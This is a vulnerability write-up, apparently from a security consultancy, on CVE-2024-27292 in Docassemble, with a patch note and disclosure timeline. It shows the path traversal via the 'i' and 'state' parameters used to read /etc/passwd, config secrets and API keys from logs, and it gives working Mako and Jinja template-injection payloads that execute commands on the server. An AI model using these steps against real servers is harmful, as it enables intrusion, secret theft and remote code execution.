This post examines CVE-2024-27292 in Docassemble, revealing an unauthenticated path traversal flaw that exposes sensitive files and secrets, leading to privilege escalation and template injection, enabling remote code execution. It details the vulnerability, its impact, and the exploitation steps.
Background
“Docassemble is a free, open-source expert system for guided interviews and document assembly. It provides a web site that conducts interviews with users. Based on the information gathered, the interviews can present users with documents in PDF, RTF, or DOCX format, which users can download or e-mail.” - https://docassemble.org/
I was introduced to Docassemble about a year ago while working on a project to automate some business development processes. Although I specialise in hacking, I also enjoy building things from time to time. I learned a lot about Docassemble when building this automation process, during which many functionalities had my hacker senses tingling. In March 2024, I decided to utilise my research time at TantoSec to take a closer look at Docassemble from a hacker’s perspective.
If you wish to follow along the blog or look at the application in your own time, it is very easy to spin up using Docker. I have used the Docassemble docker image version 1.4.96 for this research project where I deployed the application locally. Since Docassemble developer only provides the “latest” tagged image on DockerHub, you will need use git to download version 1.4.96 and build the older version of the image locally:
git clone https://github.com/jhpyle/docassemble
cd docassemble
git checkout v1.4.96
docker build -t yourname/mydocassemble .
cd ..
docker run -d -p 80:80 -p 443:443 --restart always --stop-timeout 600 yourname/mydocassemble
Initial Code Review
Docassemble is written in Python and is built using three main packages:
Since the codebase is massive, I decided to look at unauthenticated routes that the application implements. This led me to discover the /interview
route which is used by the application to display the default home page when the application is deployed:
This caught my eye immediately because the data/questions/default-interview...
value in the /?i=
parameter of the URL seems like a file path. If it is in fact a file path, this could potentially be a vector for a file path traversal vulnerability! So I went digging trying to understand how the application handles the value supplied to this URL parameter.
The implementation of this path can be found at docassemble/webapp/server.py
on line 6666
:
@app.route(index_path, methods=['POST', 'GET'])
def index(action_argument=None, refer=None):
# if refer is None and request.method == 'GET':
# setup_translation()
is_ajax = bool(request.method == 'POST' and 'ajax' in request.form and int(request.form['ajax']))
docassemble.base.functions.this_thread.misc['call'] = refer
return_fake_html = False
The app route is for the index_path
variable which is /interview
in the default installation of Docassemble. This is determined by the block of code in docassemble/webapp/server.py
on line 6638
:
if COOKIELESS_SESSIONS:
index_path = '/i'
html_index_path = '/interview'
else:
index_path = '/interview'
html_index_path = '/i'
Here, the value of index_path
depends on COOKIELESS_SESSIONS
. The COOKIELESS_SESSIONS
variable can be True or False depending on its existence in the Docassemble configuration file found in docassemble/config/config.yml
as per the code block in docassemble/webapp/server.py
on line 175
:
COOKIELESS_SESSIONS = daconfig.get('cookieless sessions', False)
This value does not exist on default installation of Docassemble so clearly the index_path
route implementation is for /interview
which we are interested in.
Now our next step is to look at where the value passed to the i
URL argument in the /interview
path is being processed. This takes us to line 6733
in docassemble/webapp/server.py
:
@app.route(index_path, methods=['POST', 'GET'])
def index(action_argument=None, refer=None):
<-- Snipped -->
if 'i' not in request.args and 'state' in request.args:
try:
yaml_filename = re.sub(r'\^.*', '', from_safeid(request.args['state']))
except:
yaml_filename = guess_yaml_filename()
else:
yaml_filename = request.args.get('i', guess_yaml_filename())
<-- Snipped -->
We can see in the code above that the /interview
route accepts state
and not just i
as the URL argument. So what is happening here? What can we do with either of these arguments? It seems that no matter which parameter is used, it is used to decide the value of yaml_filename
.
If state
is used, the code enters the if
block and passes its value to the from_safeid
function:
def safeid(text):
return re.sub(r'[\n=]', '', codecs.encode(text.encode('utf-8'), 'base64').decode())
This function simply takes a base64 encoded string and returns the original UTF-8 string. We can conclude that the state
argument takes in base64 encoded string and sets the yaml_filename
with its base64 decoded UTF-8 value.
On the other hand, If i
is used, the code enters the else
block, and simply assigns its value to yaml_filename
.
We have now established that we can either pass a base64 encoded value to state
or a UTF-8 value to i
to control yaml_filename
. But what is the application doing with yaml_filename
?
In line 6794
of docassemble/webapp/server.py
, the application passes yaml_filename
to the get_interview()
function:
interview = docassemble.base.interview_cache.get_interview(yaml_filename)
get_interview()
can be found in docassemble/base/interview_cache.py
on line 7:
def get_interview(path):
if path is None:
raise DAException("Tried to load interview source with no path")
if cache_valid(path):
the_interview = cache[path]['interview']
the_interview.from_cache = True
else:
interview_source = docassemble.base.parse.interview_source_from_string(path)
interview_source.update()
the_interview = interview_source.get_interview()
the_interview.from_cache = False
cache[interview_source.path] = {'index': interview_source.get_index(), 'interview': the_interview, 'source': interview_source}
return the_interview
This function is checks if the contents of the file path is stored in its cache using the cache_valid
function. If it is, it sets interview_source
to the contents of the cache else it passes the value of the file path to the interview_source_from_string()
function in docassemble/base/parse.py
:
def interview_source_from_string(path, **kwargs):
if path is None:
raise DAError("Passed None to interview_source_from_string")
# logmessage("Trying to find " + path)
path = re.sub(r'(docassemble.playground[0-9]+[^:]*:)data/questions/(.*)', r'\1\2', path)
for the_filename in question_path_options(path):
if the_filename is not None:
new_source = InterviewSourceFile(filepath=the_filename, path=path)
if new_source.update(**kwargs):
return new_source
raise DANotFoundError("Interview " + str(path) + " not found")
The above function removes extraneous parts of the file path, ensuring only the absolute file path remains. For example, if we recall from the beginning of this post, in a default installation of Docassemble, the default interview is shown by the application in the following URL:
http://localhost/interview?i=docassemble.base:data/questions/default-interview.yml#page1
.
The interview_source_from_string
function would filter out the data/questions/default-interview.yml
part from the value of i
. It then returns the absolute file path back to the get_interview
function where it calls the update()
function in /docassemble/base/parse.py
line 378
:
def update(self, **kwargs):
try:
with open(self.filepath, 'r', encoding='utf-8') as the_file:
orig_text = the_file.read()
except:
return False
if not orig_text.startswith('# use jinja'):
self.set_content(orig_text)
return True
env = Environment(
loader=DAFileSystemLoader(self.directory),
autoescape=select_autoescape()
)
template = env.get_template(os.path.basename(self.filepath))
data = copy.deepcopy(get_config('jinja data'))
data['__version__'] = da_version
data['__architecture__'] = da_arch
data['__filename__'] = self.path
data['__current_package__'] = self.package
data['__parent_filename__'] = kwargs.get('parent_source', self).path
data['__parent_package__'] = kwargs.get('parent_source', self).package
data['__interview_filename__'] = kwargs.get('interview_source', self).path
data['__interview_package__'] = kwargs.get('interview_source', self).package
data['__hostname__'] = get_config('external hostname', None) or 'localhost'
data['__debug__'] = bool(get_config('debug', True))
try:
self.set_content(template.render(data))
except Exception as err:
self.set_content("__error__: " + repr("Jinja2 rendering error: " + err.__class__.__name__ + ": " + str(err)))
return True
This function uses file path that we have passed and simply returns the contents of the file, resulting in a path traversal vulnerability. There is another vulnerability here for the keen eyed, but more on that later 👀
CVE-2024-27292 - Unauthenticated Path Traversal
Using our analysis up to this point, we can verify that the application is vulnerable to File Path Traversal by simply navigating to http://localhost/interview?i=/etc/passwd.
We can also exploit the same vulnerability using the state
argument, where the value passed to it is base64 encoded “/etc/passwd”:
I reported this vulnerability to Docassemble and this vulnerability was assigned CVE-2024-27292.
Using the path traversal vulnerability, we can also read the Docassemble configuration file form the Docassemble server.
This file contains sensitive hardcoded secrets that can allow attackers access to secret keys for various items that may be configured in the affected Docassemble instance. The most sensitive ones are keys for:
- OAuth
- Github
- AWS S3
- Flask Secret Key
This may result in a complete compromise of the Docassemble instance. However, this can only be exploited in cases where these services are configured to be used by Docassemble.
Escalating the Path Traversal Vulnerability
Path traversal is nice, but I wanted to find out a way to escalate this. This led me to discovering that Docassemble has its own Application Programming Interface (API). This API allows users with privilege of Administrator
or Developer
to interact with it. Docassemble uses API keys to authenticate users which can be passed as a URL parameter or by using various headers such as Authorization
or X-API-KEY
. In a scenario like the following where the API key is used within the URL, CVE-2024-27292 can be used to extract the keys from Docassemble log files:
curl http://localhost/api/list?key=H3PLMKJKIVATLDPWHJH3AGWEJPFU5GRT
If the API key does not have any restrictions, such as a whitelisted list of IPs for access, it can be used to gain a valid session of the user the extracted API key belongs to. For example, an API key can be extracted from the /usr/share/docassemble/log/access.log
log file from the following URL:
This API key can then be used to get a session cookie by simply sending a get request to any valid API endpoint such as http://localhost/api/list?key=NQEp6xD54OdGNF8Sc3tKlPZmIPLzs7W2.
This session cookie can then be used to access the application with the privilege of the user the extracted API key belongs to. In this example, an administrator’s API key was used.
Yay! So now we have a vector to gain a valid session as a user with higher privilege if the stars align. This gives us access to a wider range of functionalities in comparison to an unauthenticated user increasing the attack surface of the application.
Code Execution using a Privileged Account
Once an attacker compromises a privileged account such as an Administrator or a Developer account, there are a number of ways to get code execution on the application server. This can be achieved by installing arbitrary Python packages, writing python modules, or using python code blocks in Docassemble YAML interview files. Another such insecure feature is usage of Mako Templates to create an interview. Hacktricks has a ready to use payload for Mako template injection to gain code execution on the server. We can use that same payload in this sample YAML interview file in Docassemble Playground to execute code with a Develper or Administrator account:
mandatory: True
question: |
RCE
subquestion: |
<%
import os
command = 'id'
x=os.popen(command).read()
%>
${x}
In the following URL, use the above mentioned payload and click “Save and Run” to execute the id
command on the server:
The following page is then loaded with the output of the command:
This Server-Side Template Injection was reported to Docassemble but it was not accepted as a valid vulnerability. The developer emphasised that Docassemble was built to give interview developers the full power of a general-purpose programming language and that an administrator would not grant developer user role to an untrusted user.
We have successfully gained code execution on the server from an unauthenticated attacker’s perspective by chaining different vulnerabilities. However, this chain relies heavily on the compromise of API keys to gain valid privileged session. So I wanted to find a different path that could give us the same result without relying on the API keys.
Path Traversal to Server Side Template Injection
Going back to the Path Traversal vulnerability where we looked at the update()
function, I mentioned that there is another vulnerability. This is the same function that reads the file from the file path supplied to the vulnerable URL parameter. Let’s look at the code again and see what it is:
def update(self, **kwargs):
try:
with open(self.filepath, 'r', encoding='utf-8') as the_file:
orig_text = the_file.read()
except:
return False
if not orig_text.startswith('# use jinja'):
self.set_content(orig_text)
return True
env = Environment(
loader=DAFileSystemLoader(self.directory),
autoescape=select_autoescape()
)
template = env.get_template(os.path.basename(self.filepath))
data = copy.deepcopy(get_config('jinja data'))
data['__version__'] = da_version
data['__architecture__'] = da_arch
data['__filename__'] = self.path
data['__current_package__'] = self.package
data['__parent_filename__'] = kwargs.get('parent_source', self).path
data['__parent_package__'] = kwargs.get('parent_source', self).package
data['__interview_filename__'] = kwargs.get('interview_source', self).path
data['__interview_package__'] = kwargs.get('interview_source', self).package
data['__hostname__'] = get_config('external hostname', None) or 'localhost'
data['__debug__'] = bool(get_config('debug', True))
try:
self.set_content(template.render(data))
except Exception as err:
self.set_content("__error__: " + repr("Jinja2 rendering error: " + err.__class__.__name__ + ": " + str(err)))
return True
We can see in the code that, the if not
code block checks to see if the contents of the file in the supplied file path starts with # use jinja
. If it does, it treats it as a Jinja template and simply renders the file! So if I upload a file and control the content, then use the path traversal vulnerability to access the file, I should have code execution. This seems promising because a common theme in Docassemble interviews is to allow users to upload a file.
Let’s test this out by creating a Docassemble interview with file upload using the following YAML file in Docassemble playground with a Developer user’s account:
---
question: |
Please upload a picture of yourself.
fields:
- Picture: user_picture
datatype: file
---
question: |
You're so adorable, François!
subquestion: |
${ user_picture }
mandatory: True
This YAML template is taken directly from Docassemble’s example for a file upload. This results in the following file upload:
Using this file upload, let’s upload a file RCE.payload
with the following content:
# use jinja
{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}
The uploaded file can be accessed with the following URL in this case:
In default installation of Docassemble, the number after /uploadfile/
which in this case is 8
in the URL for the uploaded file, refers to the absolute file path /usr/share/docassemble/files/000/000/000/008/file.payload
in the web server. The file path is actually a hexadecimal representation of 8
. By this logic, if a file can be accessed using the path /uploadedfile/11/file.payload
, the corresponding absolute file path in the server would be /usr/share/docassemble/files/000/000/000/00b/file.png
. Using this logic, we can identify the exact path of the uploaded file in the web server which we can use in our path traversal vulnerability.
Since we uploaded the RCE.payload
file with #use jinja
as the first line, let’s see if we can use CVE-2024-27292 to render the injected Jinja SSTI payload by navigating to the following URL:
Great Success! Very Nice!
Patch
CVE-2024-27292 has been patched in Docassemble version 1.4.97 and above.
Timeline
29/02/2024
- Reported path traversal to Docassemble01/03/2024
- CVE-2024-27292 assigned and patched by developer08/04/2024
- Reported server-side template injection (SSTI) to Docassemble08/04/2024
- Developer response on SSTI as not valid
Conclusion
The Mako Server-Side Template Injection using a compromised privileged account was reported to Docassemble but it was not accepted as a valid vulnerability. The developer emphasised that Docassemble was built to give interview developers the full power of a general-purpose programming language and that an administrator would not grant developer user role to an untrusted user.
Docassemble was initially created to automate different processes in practicing law. However, different organisations use it for purposes such as automation, storage of user input, and application submissions. There were over 570 instances of Docassemble identified via Zoomeye.com with many of these instances still using Docassemble versions vulnerable to CVE-2024-27292. It is strongly recommended to update Docassemble to the latest version to prevent any unauthorised access to sensitive information.
It is also important to note that Docassemble should be deployed with comprehensive consideration of security best practices. Refer to the documentation available at Docassemble Security Best Practices. These guidelines can assist in ensuring a more secure deployment environment and help safeguard against potential vulnerabilities.
About the Author
Riyush Ghimire is a Security Consultant at Tanto Security, passionate about application security. He hopes to grow in the field and share his insights and findings through research. You can connect with Riyush on LinkedIn.